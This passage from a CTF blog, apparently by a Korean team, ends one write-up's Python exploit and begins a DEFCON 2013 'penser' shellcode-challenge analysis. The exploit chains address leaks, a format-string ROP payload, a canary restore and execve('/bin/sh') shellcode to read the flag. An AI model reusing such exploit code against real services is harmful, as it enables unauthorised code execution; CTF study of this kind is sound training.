<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap1 = r.split('.')[1]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read1 = r.split('.')[2]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap2 = r.split('.')[3]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read2 = r.split('.')[4]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap3 = r.split('.')[5]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read3 = r.split('.')[6]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap4 = r.split('.')[7]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read4 = r.split('.')[8]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap = unpack('B', mmap1[0])[0]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap2[0])[0] << 8</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap3[0])[0] << 16</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap4[0])[0] << 24</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap = ctypes.c_int32( mmap ).value + p_mmap + 4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read = unpack('B', read1[0])[0]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read2[0])[0] << 8</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read3[0])[0] << 16</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read4[0])[0] << 24</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read = ctypes.c_int32( read ).value + p_read + 4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'mmap : {0}'.format(hex(mmap))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'read : {0}'.format(hex(read))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage3 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># set ROP payload</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># [&mmap][&pppr][0x11111000][0x13001][7][32][-1][0][DEADBEEF][&read][0][0x11111001][0x101]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">zero = '%2$c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 = '%272c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', mmap)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', pppr)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + pack('BBB', 0x10, 0x11, 0x11)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x11111000</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('BBB', 0x01, 0x30, 0x01) + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00013001</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('B', 0x7) + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00000007</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('B', 0x32) + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00000032</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0xFFFFFFFF)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># -1</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += '%4c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', read)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0x11111001)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># ret addr of read</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># stdin</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0x11111001)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># read buffer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('BB', 0x01,0x01) + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x101</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += 'A'*(128-len(p3))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p3))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p3 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage4 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># restore stack protector</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p4 = '%2$140c' + pack('<L', ctypes.c_uint32( (canary>>8) + 0x41000000 ).value)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p4 = 'A'*(128-len(p4)) + p4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p4))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p4 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">''' stage5 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># trigger exploit</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p5 = 'n'*128</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p5))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p5 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># send shellcode</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># execve('/bin/sh')</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh = '\xE8\xFF\xFF\xFF\xFF\xC0\x8B\x34\x24\x83\xC6\x14\x31\xC9'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\xB1\xFF\x8A\x06\x30\xC8\x88\x06\x46\xE2\xF7\xCE\x2C\xAF'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x94\xD4\xD5\x8A\x90\x9F\xD9\x97\x9D\x9D\x7B\x12\xA2\xBC'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x67\x0C\xDD\x2B\x5A\xE2\x25\x67'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x90'*(0x101 - len(sh))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( sh )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># got shell.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( 'cat flag\n' )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print s.recv(4096)</span></div>
<div>
<span style="font-family: 'Courier New';"><br /></span></div>
Team. Alternativeshttp://www.blogger.com/profile/03054700226316250467noreply@blogger.com0tag:blogger.com,1999:blog-4623132413662310810.post-76888357172953861402013-06-20T05:58:00.002-07:002013-06-20T06:01:40.813-07:00DEFCON 2013 shellcode 400 - penser<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
x64 ELF is given. it's a fork-accept daemon.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;">Client Handler receives 4 bytes. as size of malloc buffer</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="347" id="tx_entry_18951_" src="http://cfile30.uf.tistory.com/image/210F874751C1A2362E8A89" width="602" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
size limit is 0x1000 bytes.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="137" id="tx_entry_75223_" src="http://cfile27.uf.tistory.com/image/2121874751C1A236205A5F" width="753" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
server receives shellcode into malloc buffer</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="202" id="tx_entry_86355_" src="http://cfile4.uf.tistory.com/image/2220EF4751C1A23723CAD1" width="586" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
server allocates RWX memory with double size of malloc buffer, then copies shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
but, actually malloc buffer has RWX permission too.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
after that malloc and mmap buffer is passed to some function(my_something).</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="650" id="tx_entry_42508_" src="http://cfile22.uf.tistory.com/image/23405D4751C1A2370FCF37" width="769" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
my_something checks if buffer and length is valid, then memsets mmap buffer to zero.<img class="txc-image" height="374" id="tx_entry_12340_" src="http://cfile4.uf.tistory.com/image/027E0C4751C1A2373AED1B" width="526" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
and there is a loop which copies the malloc buffer contents to mmap buffer in bytes.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
but the byte out of range 0x20~0x7F is not accepted. and each byte is copied with NULL.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
which means, our original shellcode has to be ASCII-UNICODE proof.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="490" id="tx_entry_37938_" src="http://cfile10.uf.tistory.com/image/273C914751C1A238113920" width="769" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
after our shellcode is UNICODED, server executes it with CALL RDX;</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="515" id="tx_entry_38191_" src="http://cfile2.uf.tistory.com/image/2307184751C1A238319276" width="601" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
it seemed to be impossible to write working reverse shellcode as ascii-unicode proof.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
so we searched for every possible assembly instructions which we can use.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
and investigated the register context / stack environment with GDB.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">Breakpoint 2, 0x0000000000401226 in ?? ()</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) i r</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rax 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rbx 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rcx 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rdx 0x7ffff7ff6000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737354096640</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rsi 0x1</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">1</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: red; font-family: 'Courier New';">rdi 0x0</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rbp 0x7fffffffe060</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x7fffffffe060</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rsp 0x7fffffffe020</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x7fffffffe020</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r8 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r9 0x300000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">3145728</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r10 0x7fffffffddc0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737488346560</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r11 0x7ffff7a959b0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737348458928</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r12 0x400f80</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">4198272</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r13 0x7fffffffe1e0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737488347616</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r14 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r15 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rip 0x401226</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x401226</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">eflags 0x206</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">[ PF IF ]</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">cs 0x33</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">51</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">ss 0x2b</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">43</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">ds 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">es 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">fs 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">gs 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) x/10x $rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
